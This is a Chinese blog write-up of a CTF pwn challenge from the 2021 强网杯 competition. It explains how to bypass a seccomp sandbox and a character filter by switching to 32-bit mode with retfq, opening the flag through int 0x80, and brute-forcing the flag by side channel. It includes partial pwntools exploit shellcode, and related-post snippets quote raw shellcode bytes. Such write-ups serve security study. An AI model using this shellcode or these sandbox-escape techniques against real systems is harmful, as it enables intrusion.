2021 强网杯 [强网先锋] shellcode

最新推荐文章于 2023-04-28 15:48:14 发布
原创 最新推荐文章于 2023-04-28 15:48:14 发布 · 1.2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了如何在存在沙箱和特定字符限制的环境中编写shellcode,利用retfq指令切换到32位模式,通过mmap分配内存,再read加载32位shellcode。然后通过爆破方法逐字符获取flag。详细讲解了shellcode的构造过程,包括open、read等系统调用的使用,并展示了实际的exploit代码。

在这里插入图片描述
在这里插入图片描述
就是写入shellcode跑就行。但是shellcode不能有小于’\x1f’,也不能有等于‘\x7f’。问题的关键在于开了沙箱。

在这里插入图片描述只能使用这些系统调用。
orw只有r,怎么处理。

首先看o,我们发现给了系统调用5,这个系统调用在64的时候是fstat,但是在32模式情况下就是open,所以我们首先考虑使用retfq汇编语句来让我们的整个模式跳到32位,在32位下去调用系统调用5就可以获得open。
retfq使用的时候要注意,cs寄存器中存储的一个数字,0x23表示32位,0x33表示64位。调用retfq之后esp是cs寄存器值,esp+8就是返回地址了。

但是我们发现,我们把32位shellcode读到栈上以后栈的整个环境是64的,就会产生矛盾,所以我们需要一块全新的地方来写入我们的32位shellcode。
我们看到了系统调用可以mmap,所以我们第一步就是mmap申请一块地方,然后read32位shellcode过去。这里说一嘴因为syscall的汇编代码被ban了,所以我们写汇编语句的时候要耍点小手段,通过xor来得到syscall。

此时我们要读入shellcode到mmap,这个时候对我们的字符不会有检查,就随便写了。我们首先open打开文件,然后跳回64位,把读flag读出来,然后呢,没有write。

所以我们参考了2021蓝帽杯的silent,我们爆破,将每个可见字符拿去跟我们的flag进行比较,假如命中,我们让它跳入loop循环,假如我们程序卡在那里,说明命中了,然后一个字符一个字符爆破,得到flag。

下面的flag我自己写的,爆破大概爆了十分钟吧。
在这里插入图片描述

exp

#coding:utf-8
from pwn import *
context.log_level = 'debug'

append_x86 = '''
push ebx
pop ebx
'''
shellcode_x86 = '''
/*fp = open("flag")*/
mov esp,0x40404140
push 0x67616c66
push esp
pop ebx
xor ecx,ecx
mov eax,5
int 0x80
mov ecx,eax
'''
shellcode_flag = '''
push 0x33
push 0x40404089
retfq
'''

shellcode_x86
最低0.47元/天 解锁文章
强网2021CTF 强网先锋shellcode侧信道攻击复现
qq_39948058的博客
08-27 1695
前言:由于个别原因这个比赛忘记参加了,所以赛后挑选了一道测信道攻击的题来进行复现,这个题开启了沙盒,采用测信道爆破flag,大概思路:使用retf切换到32位open来进行open('./flag'),retfq再回到64位的write和read就可以了,此题禁用了open所以使用32位的open,如果禁用了write就使用32位的write,同理,具体代码分析,懂汇编就能看懂这里就不赘述了,参考了别的大佬的exp,大概就是这样写的,至于系统调用号可以参考前篇调用号文章 exp: from pwn i
2021强网wp
灰太的表格的博客
06-15 2299
(这次比赛做出的四个web总结下。赛后过的两天才写的wp的有好多可能没记录到,自己还比较菜,师傅们轻点喷。。) 赌徒 寻宝 pop_master easyweb 赌徒 打开提示/etc/hint文件。源码泄露有web.zip <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='sys
强网2021 pop-master
azraelxuemo的博客
08-12 464
这个题目比较好的思路是写静态分析利用代码 当然这个题目可能混淆不是很多,所以利用起来稍微方便一点,可以参考如下代码 首先下载pop代码保存为class.php 保存下面php静态分析代码为filter.php.需要修改你本地的autoload.php位置和entryFunc的内容 <?php ini_set('max_execution_time', '300'); require 'D:\phpstudy_pro\Extensions\php\php8.0.2nts\ext\vendor\autol
2021 强网 [强网先锋]orw
yongbaoii的博客
06-23 666
RELRO没都开,能劫持got,NX也没开,总得写点shellcode。 是个堆。 只能申请两个chunk,但是好像有个序号可以越界。
强网2021 [强网先锋]orw
半岛铁盒的博客
06-29 919
orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 因为不是FULL RELRO所以就考虑改got表为shellcode地址就行了 漏洞点就在于以上两点 令index下标为负数时可以覆盖到其他函数的got表地址 这里选择覆盖掉exit的got表中的地址,因为沙盒的存在,所以需要构造orw的shellcode并覆盖exit的got地址为shellcode 覆盖堆块的申请位置选择在这里 计算一下偏移量 起始点 0x
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 1192
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
精选资源
2021强网Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021强网Writeup--by Nu1L Team.pdf”,“第五届‘强网’全国安全挑战赛”以及标签“CTF 安全 信息安全”。这些信息共同指向一个全国性的安全竞赛和Nu1L团队提交的...
[复现]-2021强网 [强网先锋]赌徒
zji
06-27 672
[复现]-2021强网 [强网先锋]赌徒 主要过程 首先我是centos7 php 。然后vim /flag根目录创建flag flag{35-44c7-850e-131e10c9a6ud} 我省略了zip.www扫描源码。 1、 在根目录下建立flag文件(这个文件在正式做题中我们是见不到的,实际上是需要我们通过解题找到这个文件的) vim /flag输入flag: flag{70702196032-ec35-44c7-850e-131e10c9a6ud} 保存退出 2、 在站目录建立test
题目源码2024年强网全国安全挑战赛 Web题目PyBlockly源码
最新发布
11-04
强网全国安全挑战赛是中国国内知名的安全赛事之一,旨在通过竞赛的形式,激发安全从业者的创新热情,提高安全防护能力,加强网安全技术交流。作为该赛事的一部分,Web题目通常涉及一系列关于...
2021 天翼 pwn ezshell
yongbaoii的博客
09-24 1197
逻辑简单,开了一个可以rwx的页,我们输入一段shellcode,绕过一些检查,开了沙箱,最后执行它。 一点一点来,首先我们输入shellcode之后函数__ctype_b_loc函数是干嘛的? 我们去读源码,在ctype/ctype.h #ifndef _ISbit /* These are all the characteristics of characters. If there get to be more than 16 distinct characteristics, many.
pwn题shellcode收集
lifanxin的博客
02-25 5718
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
SCU新生赛2021 pwn wp
N1rvana的博客
11-29 4417
前段时间的极客大挑战20212021年的SCU新生赛,最后一道题都没有做出来,作为一枚大二学长确实应该反省一下自己了。太菜了呜呜呜。极客大挑战因为打太久了,题目都快忘记了,就不写wp了。 ret2text 简单的栈溢出,pwn里的hello world。 from pwn import * r = process("/mnt/hgfs/ubuntu/stackoverflow") elf = ELF("/mnt/hgfs/ubuntu/stackoverflow") payload = b'a'*0x3
强网2021线上赛习得
Wawyw's Blog
06-18 1034
0x00 前言 强网的题目质量就是高,奈何没几个我会做的????(还是太菜) 以下对从这次比赛所学习到的干货(主要是web方面)进行记录。 0x01 pop_master index.php 代码 <?php include "class.php"; //class.php.txt highlight_file(__FILE__); $a = $_GET['pop']; $b = $_GET['argv']; $class = unserialize($a); $class->NGPaqV($
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1343
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hehepwn
yongbaoii的博客
09-27 469
利用格式化字符串泄露canary再ret2libc就可以了。 开了沙箱,可以先mprotect一下,再用shellcode来orw。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') els.
shellcode 的艺术
2301_77498991的博客
04-28 401
这里总结一下shellcode的各种类型。
[BUUCTF]PWN——[BSidesCF 2019]Runit(mmap+shellcode
mcmuyanga的博客
04-12 666
[BSidesCF 2019]Runit 例行检查,32位程序,开启了nx保护 运行一下看看大概的情况 ida载入 虽然开了nx,但是buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 exp from pwn import * p=remote("node3.buuoj.cn",25055) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendlin
一步一步学ROP之gadgets和2free篇
omnispace的博客
03-06 2596
原文: http://drops.wooyun.org/binary/10638 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术,可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x64的ROP攻击。 一步一步学ROP之linux_x86篇http://d
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值